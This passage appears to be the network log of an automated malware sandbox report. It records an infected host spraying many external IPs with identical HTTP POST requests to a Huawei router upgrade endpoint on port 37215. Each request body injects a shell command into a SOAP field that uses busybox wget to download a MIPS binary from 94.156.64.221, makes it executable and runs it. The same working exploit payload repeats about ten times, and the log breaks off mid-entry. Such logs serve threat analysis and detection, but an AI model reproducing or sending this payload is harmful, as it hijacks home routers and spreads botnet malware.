                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    353192.168.2.2336160156.221.125.637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275278091 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    354192.168.2.2340920197.235.211.7437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275319099 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    355192.168.2.234491241.247.195.21237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275348902 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    356192.168.2.2358696156.9.202.17937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275397062 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    357192.168.2.2350042197.5.246.9037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275438070 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    358192.168.2.234563241.160.105.7237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275476933 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    359192.168.2.2338772197.231.220.2237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275510073 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    360192.168.2.2358124156.254.50.14437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275552034 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    361192.168.2.235849641.103.71.24437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275592089 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    362192.168.2.2359058156.4.146.24237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.275630951 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
